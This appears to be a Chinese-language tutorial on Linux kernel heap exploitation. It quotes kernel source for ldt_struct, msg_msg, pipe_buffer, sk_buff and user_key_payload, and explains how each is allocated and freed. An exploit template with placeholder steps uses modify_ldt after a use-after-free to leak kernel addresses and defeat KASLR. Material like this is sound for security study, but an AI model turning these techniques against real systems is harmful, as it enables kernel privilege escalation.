#ifdef CONFIG_SLAB /* * The largest kmalloc size supported by the SLAB allocators is * 32 megabyte (2^25) or the maximum allocatable page order if that is * less than 32 MB. * * WARNING: Its not easy to increase this value since the allocators have * to do various tricks to work around compiler limitations in order to * ensure proper constant folding. */ #define KMALLOC_SHIFT_HIGH ((MAX_ORDER + PAGE_SHIFT - 1) <= 25 ? \ (MAX_ORDER + PAGE_SHIFT - 1) : 25) #define KMALLOC_SHIFT_MAX KMALLOC_SHIFT_HIGH #ifndef KMALLOC_SHIFT_LOW #define KMALLOC_SHIFT_LOW 5 #endif #endif
/** * struct tty_struct - state associated with a tty while open * * @flow.lock: lock for flow members * @flow.stopped: tty stopped/started by tty_stop/tty_start * @flow.tco_stopped: tty stopped/started by TCOOFF/TCOON ioctls (it has * precedense over @flow.stopped) * @flow.unused: alignment for Alpha, so that no members other than @flow.* are * modified by the same 64b word store. The @flow's __aligned is * there for the very same reason. * @ctrl.lock: lock for ctrl members * @ctrl.pgrp: process group of this tty (setpgrp(2)) * @ctrl.session: session of this tty (setsid(2)). Writes are protected by both * @ctrl.lock and legacy mutex, readers must use at least one of * them. * @ctrl.pktstatus: packet mode status (bitwise OR of TIOCPKT_* constants) * @ctrl.packet: packet mode enabled * * All of the state associated with a tty while the tty is open. Persistent * storage for tty devices is referenced here as @port in struct tty_port. */ structtty_struct { int magic; structkrefkref; structdevice *dev;/* class device or NULL (e.g. ptys, serdev) */ structtty_driver *driver; conststructtty_operations *ops; int index;
int closing; unsignedchar *write_buf; int write_cnt; /* If the tty has a pending do_SAK, queue it here - akpm */ structwork_structSAK_work; structtty_port *port; } __randomize_layout;
/* Each of a tty's open files has private_data pointing to tty_file_private */ structtty_file_private { structtty_struct *tty; structfile *file; structlist_headlist; };
SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr , unsignedlong , bytecount) { int ret = -ENOSYS;
switch (func) { case0: ret = read_ldt(ptr, bytecount); break; case1: ret = write_ldt(ptr, bytecount, 1); break; case2: ret = read_default_ldt(ptr, bytecount); break; case0x11: ret = write_ldt(ptr, bytecount, 0); break; } /* * The SYSCALL_DEFINE() macros give us an 'unsigned long' * return type, but tht ABI for sys_modify_ldt() expects * 'int'. This cast gives us an int-sized value in %rax * for the return code. The 'unsigned' is necessary so * the compiler does not try to sign-extend the negative * return codes into the high half of the register when * taking the value from int->long. */ return (unsignedint)ret; }
structldt_struct { /* * Xen requires page-aligned LDTs with special permissions. This is * needed to prevent us from installing evil descriptors such as * call gates. On native, we could merge the ldt_struct and LDT * allocations, but it's not worth trying to optimize. */ structdesc_struct *entries; unsignedint nr_entries;
/* * If PTI is in use, then the entries array is not mapped while we're * in user mode. The whole array will be aliased at the addressed * given by ldt_slot_va(slot). We use two slots so that we can allocate * and map, and enable a new LDT without invalidating the mapping * of an older, still-in-use LDT. * * slot will be -1 if this LDT doesn't have an alias mapping. */ int slot; };
/* * Called on fork from arch_dup_mmap(). Just copy the current LDT state, * the new task is not running, so nothing can be installed. */ intldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm) { //...
/** * do something to make the following ldt_struct to be modifiable, * e.g. alloc and free a 32B GFP_KERNEL object under a UAF. * * Your code here: */
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
/* leak kernel direct mapping area by modify_ldt() */ while(1) { /** * do something to modify the ldt_struct->entries * Your code here: */
/* leak kernel base from direct mappinig area by modify_ldt() */ /** * do something there to modify the ldt_struct->entries * to page_offset_base + 0x9d000, pointer of secondary_startup_64() is here, * read it out and we can get the base of `.text` segment. * * Your code here: */
/* search for something in kernel space */ pipe(pipe_fd); buf = (char*) mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0); while(1) { /** * modify the ldt_struct->entries to `search_addr` here, * if you have to modify the ldt_struct->nr_entries at the same time, * set it to `0x8000 / 8` is just okay. * * Your code here: */
if (!fork()) { /* child process */ char *find_addr;
syscall(SYS_modify_ldt, 0, buf, 0x8000); /* search for what you want there, this's an example */ find_addr = memmem(buf, 0x8000, "arttnba3", 8); if (find_addr) { result_addr = search_addr + (uint64_t)(find_addr - buf); } write(pipe_fd[1], &result_addr, 8); exit(0); } /* parent process */ wait(NULL); read(pipe_fd[0], &result_addr, 8); if (result_addr != -1) { break; } search_addr += 0x8000; }
printf("\033[34m\033[1m[+] Obj found at addr: \033[0m%llx\n", result_addr);
/* * shm_file_operations_huge is now identical to shm_file_operations, * but we keep it distinct for the sake of is_file_shm_hugepages(). */ staticconststructfile_operationsshm_file_operations_huge = { .mmap = shm_mmap, .fsync = shm_fsync, .release = shm_release, .get_unmapped_area = shm_get_unmapped_area, .llseek = noop_llseek, .fallocate = shm_fallocate, };
/* one msq_queue structure for each present queue on the system */ structmsg_queue { structkern_ipc_permq_perm; time64_t q_stime; /* last msgsnd time */ time64_t q_rtime; /* last msgrcv time */ time64_t q_ctime; /* last change time */ unsignedlong q_cbytes; /* current number of bytes on queue */ unsignedlong q_qnum; /* number of messages in queue */ unsignedlong q_qbytes; /* max number of bytes on queue */ structpid *q_lspid;/* pid of last msgsnd */ structpid *q_lrpid;/* last receive pid */
/* one msg_msg structure for each message */ structmsg_msg { structlist_headm_list; long m_type; size_t m_ts; /* message text size */ structmsg_msgseg *next; void *security; /* the actual message follows immediately */ };
for (seg = msg->next; seg != NULL; seg = seg->next) { len -= alen; dest = (char __user *)dest + alen; alen = min(len, DATALEN_SEG); if (copy_to_user(dest, seg + 1, alen)) return-1; } return0; }
staticlongdo_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg, long (*msg_handler)(void __user *, struct msg_msg *, size_t)) { //...
if (msgflg & MSG_COPY) { if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT)) return -EINVAL; copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); if (IS_ERR(copy)) return PTR_ERR(copy); } //...
for (;;) { //... msg = find_msg(msq, &msgtyp, mode); if (!IS_ERR(msg)) { /* * Found a suitable message. * Unlink it from the queue. */ if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) { msg = ERR_PTR(-E2BIG); goto out_unlock0; } /* * If we are copying, then do not unlink message and do * not update queue parameters. */ if (msgflg & MSG_COPY) { msg = copy_msg(msg, copy); goto out_unlock0; }
/** * the msgp should be a pointer to the `struct msgbuf`, * and the data should be stored in msgbuf.mtext */ intwriteMsg(int msqid, void *msgp, size_t msgsz, long msgtyp) { ((struct msgbuf*)msgp)->mtype = msgtyp; return msgsnd(msqid, msgp, msgsz, 0); }
/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */ intpeekMsg(int msqid, void *msgp, size_t msgsz, long msgtyp) { return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR); }
/** * struct pipe_inode_info - a linux kernel pipe * @mutex: mutex protecting the whole thing * @rd_wait: reader wait point in case of empty pipe * @wr_wait: writer wait point in case of full pipe * @head: The point of buffer production * @tail: The point of buffer consumption * @note_loss: The next read() should insert a data-lost message * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe * @files: number of struct file referring this pipe (protected by ->i_lock) * @r_counter: reader counter * @w_counter: writer counter * @fasync_readers: reader side fasync * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ structpipe_inode_info { structmutexmutex; wait_queue_head_t rd_wait, wr_wait; unsignedint head; unsignedint tail; unsignedint max_usage; unsignedint ring_size; #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif unsignedint nr_accounted; unsignedint readers; unsignedint writers; unsignedint files; unsignedint r_counter; unsignedint w_counter; structpage *tmp_page; structfasync_struct *fasync_readers; structfasync_struct *fasync_writers; structpipe_buffer *bufs; structuser_struct *user; #ifdef CONFIG_WATCH_QUEUE structwatch_queue *watch_queue; #endif };
/** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ structpipe_buffer { structpage *page; unsignedint offset, len; conststructpipe_buf_operations *ops; unsignedint flags; unsignedlong private; };
structpipe_buf_operations { /* * ->confirm() verifies that the data in the pipe buffer is there * and that the contents are good. If the pages in the pipe belong * to a file system, we may need to wait for IO completion in this * hook. Returns 0 for good, or a negative error value in case of * error. If not present all pages are considered good. */ int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
/* * When the contents of this pipe buffer has been completely * consumed by a reader, ->release() is called. */ void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
/* * Attempt to take ownership of the pipe buffer and its contents. * ->try_steal() returns %true for success, in which case the contents * of the pipe (the buf->page) is locked and now completely owned by the * caller. The page may then be transferred to a different mapping, the * most often used case is insertion into different file address space * cache. */ bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
/* * Get a reference to the pipe buffer. */ bool (*get)(struct pipe_inode_info *, struct pipe_buffer *); };
存在如下调用链:
1 2 3 4 5
pipe_release() put_pipe_info() free_pipe_info() pipe_buf_release() pipe_buffer->pipe_buf_operations->release() // it should be anon_pipe_buf_release()
/** * pipe_buf_release - put a reference to a pipe_buffer * @pipe: the pipe that the buffer belongs to * @buf: the buffer to put a reference to */ staticinlinevoidpipe_buf_release(struct pipe_inode_info *pipe, struct pipe_buffer *buf) { conststructpipe_buf_operations *ops = buf->ops;
structsk_buff { union { struct { /* These two members must be first. */ structsk_buff *next; structsk_buff *prev;
// ... };
// ...
/* These elements must be at the end, see alloc_skb() for details. */ sk_buff_data_t tail; sk_buff_data_t end; unsignedchar *head, *data; unsignedint truesize; refcount_t users;
#ifdef CONFIG_SKB_EXTENSIONS /* only useable after checking ->active_extensions != 0 */ structskb_ext *extensions; #endif };
sk_buff 结构体与其所表示的数据包形成如下结构,其中:
head :一个数据包实际的起始处(也就是为该数据包分配的 object 的首地址)
end :一个数据包实际的末尾(为该数据包分配的 object 的末尾地址)
data :当前所在 layer 的数据包对应的起始地址
tail :当前所在 layer 的数据包对应的末尾地址
data 和 tail 可以这么理解:数据包每经过网络层次模型中的一层都会被添加/删除一个 header (有时还有一个 tail),data 与 tail 便是用以对此进行标识的
if (sk_memalloc_socks() && (flags & SKB_ALLOC_RX)) gfp_mask |= __GFP_MEMALLOC;
/* Get the HEAD */ if ((flags & (SKB_ALLOC_FCLONE | SKB_ALLOC_NAPI)) == SKB_ALLOC_NAPI && likely(node == NUMA_NO_NODE || node == numa_mem_id())) skb = napi_skb_cache_get(); else skb = kmem_cache_alloc_node(cache, gfp_mask & ~GFP_DMA, node); if (unlikely(!skb)) returnNULL; prefetchw(skb);
/* We do our best to align skb_shared_info on a separate cache * line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives * aligned memory blocks, unless SLUB/SLAB debug is enabled. * Both skb->head and skb_shared_info are cache line aligned. */ size = SKB_DATA_ALIGN(size); size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info)); data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc); //...
/* * Free an skbuff by memory without cleaning the state. */ staticvoidkfree_skbmem(struct sk_buff *skb) { structsk_buff_fclones *fclones;
switch (skb->fclone) { case SKB_FCLONE_UNAVAILABLE: kmem_cache_free(skbuff_head_cache, skb); return;
case SKB_FCLONE_ORIG: fclones = container_of(skb, struct sk_buff_fclones, skb1);
/* We usually free the clone (TX completion) before original skb * This test would have no chance to be true for the clone, * while here, branch prediction will be good. */ if (refcount_read(&fclones->fclone_ref) == 1) goto fastpath; break;
upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL); if (!upayload) return -ENOMEM;
/* attach the data */ prep->quotalen = datalen; prep->payload.data[0] = upayload; upayload->datalen = datalen; memcpy(upayload->data, prep->data, datalen); return0; }
user_key_payload 的定义如下:
1 2 3 4 5
structuser_key_payload { structrcu_headrcu;/* RCU destructor */ unsignedshort datalen; /* length of this data */ char data[] __aligned(__alignof__(u64)); /* actual data */ };
/* pull the payload in if one was supplied */ payload = NULL; if (plen) { ret = -ENOMEM; payload = kvmalloc(plen, GFP_KERNEL); if (!payload) goto error;
ret = -EFAULT; if (copy_from_user(payload, _payload, plen) != 0) goto error2; }
/* find the target key (which must be writable) */ key_ref = lookup_user_key(id, 0, KEY_NEED_WRITE); if (IS_ERR(key_ref)) { ret = PTR_ERR(key_ref); goto error2; }
/* update the key */ ret = key_update(key_ref, payload, plen);
/* check the quota and attach the new data */ ret = key_payload_reserve(key, prep->datalen); if (ret < 0) return ret;
/* attach the new data, displacing the old */ key->expiry = prep->expiry; if (key_is_positive(key)) zap = dereference_key_locked(key); rcu_assign_keypointer(key, prep->payload.data[0]); prep->payload.data[0] = NULL;
if (zap) call_rcu(&zap->rcu, user_free_payload_rcu); return ret; }
/* * Free a preparse of a user defined key payload */ voiduser_free_preparse(struct key_preparsed_payload *prep) { kfree_sensitive(prep->payload.data[0]); }
staticintpacket_create(struct net *net, struct socket *sock, int protocol, int kern) { //... sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern);
sk_alloc() 最后会调用到 sk_prot_alloc(),对于在协议对应的 proto 结构体中有指定 kmem_cache 的情况而言会直接从其中分配对象,否则走常规的 kmalloc 分配路径,这里我们注意到分配的 flag 为 GFP_KERNEL